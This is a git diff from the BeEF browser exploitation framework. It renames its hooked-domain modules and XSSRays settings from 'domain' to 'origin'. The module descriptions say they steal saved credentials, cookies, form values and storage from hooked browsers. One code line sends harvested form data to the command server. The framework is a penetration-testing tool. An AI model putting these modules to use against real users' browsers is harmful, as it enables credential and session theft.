diff --git a/modules/browser/hooked_domain/disable_developer_tools/config.yaml b/modules/browser/hooked_origin/disable_developer_tools/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/disable_developer_tools/config.yaml
rename to modules/browser/hooked_origin/disable_developer_tools/config.yaml
diff --git a/modules/browser/hooked_domain/disable_developer_tools/module.rb b/modules/browser/hooked_origin/disable_developer_tools/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/disable_developer_tools/module.rb
rename to modules/browser/hooked_origin/disable_developer_tools/module.rb
diff --git a/modules/browser/hooked_domain/get_autocomplete_creds/command.js b/modules/browser/hooked_origin/get_autocomplete_creds/command.js
similarity index 100%
rename from modules/browser/hooked_domain/get_autocomplete_creds/command.js
rename to modules/browser/hooked_origin/get_autocomplete_creds/command.js
diff --git a/modules/browser/hooked_domain/get_autocomplete_creds/config.yaml b/modules/browser/hooked_origin/get_autocomplete_creds/config.yaml
similarity index 90%
rename from modules/browser/hooked_domain/get_autocomplete_creds/config.yaml
rename to modules/browser/hooked_origin/get_autocomplete_creds/config.yaml
index 1b531808d..632f8cec8 100644
--- a/modules/browser/hooked_domain/get_autocomplete_creds/config.yaml
+++ b/modules/browser/hooked_origin/get_autocomplete_creds/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: ["Browser", "Hooked Domain"]
name: "Get Autocomplete Credentials"
- description: "This module steals saved credentials for the hooked domain.
Tested on Firefox 68 and Chrome 49.
Note: On Firefox, the window must have focus."
+ description: "This module steals saved credentials for the hooked origin.
Tested on Firefox 68 and Chrome 49.
Note: On Firefox, the window must have focus."
authors: ["bcoles"]
target:
working: ["FF", "C"]
diff --git a/modules/browser/hooked_domain/get_autocomplete_creds/module.rb b/modules/browser/hooked_origin/get_autocomplete_creds/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/get_autocomplete_creds/module.rb
rename to modules/browser/hooked_origin/get_autocomplete_creds/module.rb
diff --git a/modules/browser/hooked_domain/get_cookie/command.js b/modules/browser/hooked_origin/get_cookie/command.js
similarity index 100%
rename from modules/browser/hooked_domain/get_cookie/command.js
rename to modules/browser/hooked_origin/get_cookie/command.js
diff --git a/modules/browser/hooked_domain/get_cookie/config.yaml b/modules/browser/hooked_origin/get_cookie/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/get_cookie/config.yaml
rename to modules/browser/hooked_origin/get_cookie/config.yaml
diff --git a/modules/browser/hooked_domain/get_cookie/module.rb b/modules/browser/hooked_origin/get_cookie/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/get_cookie/module.rb
rename to modules/browser/hooked_origin/get_cookie/module.rb
diff --git a/modules/browser/hooked_domain/get_form_values/command.js b/modules/browser/hooked_origin/get_form_values/command.js
similarity index 100%
rename from modules/browser/hooked_domain/get_form_values/command.js
rename to modules/browser/hooked_origin/get_form_values/command.js
diff --git a/modules/browser/hooked_domain/get_form_values/config.yaml b/modules/browser/hooked_origin/get_form_values/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/get_form_values/config.yaml
rename to modules/browser/hooked_origin/get_form_values/config.yaml
diff --git a/modules/browser/hooked_domain/get_form_values/module.rb b/modules/browser/hooked_origin/get_form_values/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/get_form_values/module.rb
rename to modules/browser/hooked_origin/get_form_values/module.rb
diff --git a/modules/browser/hooked_domain/get_local_storage/command.js b/modules/browser/hooked_origin/get_local_storage/command.js
similarity index 100%
rename from modules/browser/hooked_domain/get_local_storage/command.js
rename to modules/browser/hooked_origin/get_local_storage/command.js
diff --git a/modules/browser/hooked_domain/get_local_storage/config.yaml b/modules/browser/hooked_origin/get_local_storage/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/get_local_storage/config.yaml
rename to modules/browser/hooked_origin/get_local_storage/config.yaml
diff --git a/modules/browser/hooked_domain/get_local_storage/module.rb b/modules/browser/hooked_origin/get_local_storage/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/get_local_storage/module.rb
rename to modules/browser/hooked_origin/get_local_storage/module.rb
diff --git a/modules/browser/hooked_domain/get_page_html/command.js b/modules/browser/hooked_origin/get_page_html/command.js
similarity index 100%
rename from modules/browser/hooked_domain/get_page_html/command.js
rename to modules/browser/hooked_origin/get_page_html/command.js
diff --git a/modules/browser/hooked_domain/get_page_html/config.yaml b/modules/browser/hooked_origin/get_page_html/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/get_page_html/config.yaml
rename to modules/browser/hooked_origin/get_page_html/config.yaml
diff --git a/modules/browser/hooked_domain/get_page_html/module.rb b/modules/browser/hooked_origin/get_page_html/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/get_page_html/module.rb
rename to modules/browser/hooked_origin/get_page_html/module.rb
diff --git a/modules/browser/hooked_domain/get_page_html_iframe/command.js b/modules/browser/hooked_origin/get_page_html_iframe/command.js
similarity index 100%
rename from modules/browser/hooked_domain/get_page_html_iframe/command.js
rename to modules/browser/hooked_origin/get_page_html_iframe/command.js
diff --git a/modules/browser/hooked_domain/get_page_html_iframe/config.yaml b/modules/browser/hooked_origin/get_page_html_iframe/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/get_page_html_iframe/config.yaml
rename to modules/browser/hooked_origin/get_page_html_iframe/config.yaml
diff --git a/modules/browser/hooked_domain/get_page_html_iframe/module.rb b/modules/browser/hooked_origin/get_page_html_iframe/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/get_page_html_iframe/module.rb
rename to modules/browser/hooked_origin/get_page_html_iframe/module.rb
diff --git a/modules/browser/hooked_domain/get_page_links/command.js b/modules/browser/hooked_origin/get_page_links/command.js
similarity index 100%
rename from modules/browser/hooked_domain/get_page_links/command.js
rename to modules/browser/hooked_origin/get_page_links/command.js
diff --git a/modules/browser/hooked_domain/get_page_links/config.yaml b/modules/browser/hooked_origin/get_page_links/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/get_page_links/config.yaml
rename to modules/browser/hooked_origin/get_page_links/config.yaml
diff --git a/modules/browser/hooked_domain/get_page_links/module.rb b/modules/browser/hooked_origin/get_page_links/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/get_page_links/module.rb
rename to modules/browser/hooked_origin/get_page_links/module.rb
diff --git a/modules/browser/hooked_domain/get_session_storage/command.js b/modules/browser/hooked_origin/get_session_storage/command.js
similarity index 100%
rename from modules/browser/hooked_domain/get_session_storage/command.js
rename to modules/browser/hooked_origin/get_session_storage/command.js
diff --git a/modules/browser/hooked_domain/get_session_storage/config.yaml b/modules/browser/hooked_origin/get_session_storage/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/get_session_storage/config.yaml
rename to modules/browser/hooked_origin/get_session_storage/config.yaml
diff --git a/modules/browser/hooked_domain/get_session_storage/module.rb b/modules/browser/hooked_origin/get_session_storage/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/get_session_storage/module.rb
rename to modules/browser/hooked_origin/get_session_storage/module.rb
diff --git a/modules/browser/hooked_domain/get_stored_credentials/command.js b/modules/browser/hooked_origin/get_stored_credentials/command.js
similarity index 97%
rename from modules/browser/hooked_domain/get_stored_credentials/command.js
rename to modules/browser/hooked_origin/get_stored_credentials/command.js
index d6a5f163a..8d0c40209 100644
--- a/modules/browser/hooked_domain/get_stored_credentials/command.js
+++ b/modules/browser/hooked_origin/get_stored_credentials/command.js
@@ -59,7 +59,7 @@ beef.execute(function() {
}
} catch (e) {
- // return if no forms were found or login page is cross-domain
+ // return if no forms were found or login page is cross-origin
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'form_data=Could not read form data from '+login_url);
}
document.body.removeChild(iframe);
diff --git a/modules/browser/hooked_domain/get_stored_credentials/config.yaml b/modules/browser/hooked_origin/get_stored_credentials/config.yaml
similarity index 81%
rename from modules/browser/hooked_domain/get_stored_credentials/config.yaml
rename to modules/browser/hooked_origin/get_stored_credentials/config.yaml
index 0ac261c1e..fed05f79a 100644
--- a/modules/browser/hooked_domain/get_stored_credentials/config.yaml
+++ b/modules/browser/hooked_origin/get_stored_credentials/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: ["Browser", "Hooked Domain"]
name: "Get Stored Credentials"
- description: "This module retrieves saved username/password combinations from the login page on the hooked domain.
It will fail if more than one set of domain credentials are saved in the browser."
+ description: "This module retrieves saved username/password combinations from the login page on the hooked origin.
diff --git a/extensions/xssrays/rest/xssrays.rb b/extensions/xssrays/rest/xssrays.rb
index 9d3a0a66e..45e96e0cb 100644
--- a/extensions/xssrays/rest/xssrays.rb
+++ b/extensions/xssrays/rest/xssrays.rb
@@ -17,7 +17,7 @@ module BeEF
halt 403 unless BeEF::Core::Rest.permitted_source?(request.ip)
CLEAN_TIMEOUT = config.get('beef.extension.xssrays.clean_timeout') || 3_000
- CROSS_DOMAIN = config.get('beef.extension.xssrays.cross_domain') || true
+ CROSS_ORIGIN = config.get('beef.extension.xssrays.cross_origin') || true
HB = BeEF::Core::Models::HookedBrowser
XS = BeEF::Core::Models::Xssraysscan
@@ -118,12 +118,12 @@ module BeEF
return
end
- # set Cross-domain settings
- cross_domain = params[:cross_domain].to_s
- cross_domain = if cross_domain == ''
- CROSS_DOMAIN
+ # set Cross-origin settings
+ cross_origin = params[:cross_origin].to_s
+ cross_origin = if cross_origin == ''
+ CROSS_ORIGIN
else
- cross_domain != 'false'
+ cross_origin != 'false'
end
# set clean timeout settings
@@ -134,8 +134,8 @@ module BeEF
hooked_browser_id: hooked_browser.id,
scan_start: Time.now,
domain: hooked_browser.domain,
- # check also cross-domain URIs found by the crawler
- cross_domain: cross_domain,
+ # check also cross-origin URIs found by the crawler
+ cross_origin: cross_origin,
# how long to wait before removing the iFrames from the DOM (5000ms default)
clean_timeout: clean_timeout
)
@@ -143,8 +143,8 @@ module BeEF
print_info(
"[XSSRays] Starting XSSRays [ip:#{hooked_browser.ip}], " \
- "hooked domain [#{hooked_browser.domain}], " \
- "cross-domain: #{cross_domain}, " \
+ "hooked origin [#{hooked_browser.domain}], " \
+ "cross-origin: #{cross_origin}, " \
"clean timeout: #{clean_timeout}"
)
@@ -181,7 +181,7 @@ module BeEF
scan_start: scan.scan_start,
scan_finish: scan.scan_finish,
domain: scan.domain,
- cross_domain: scan.cross_domain,
+ cross_origin: scan.cross_origin,
clean_timeout: scan.clean_timeout,
is_started: scan.is_started,
is_finished: scan.is_finished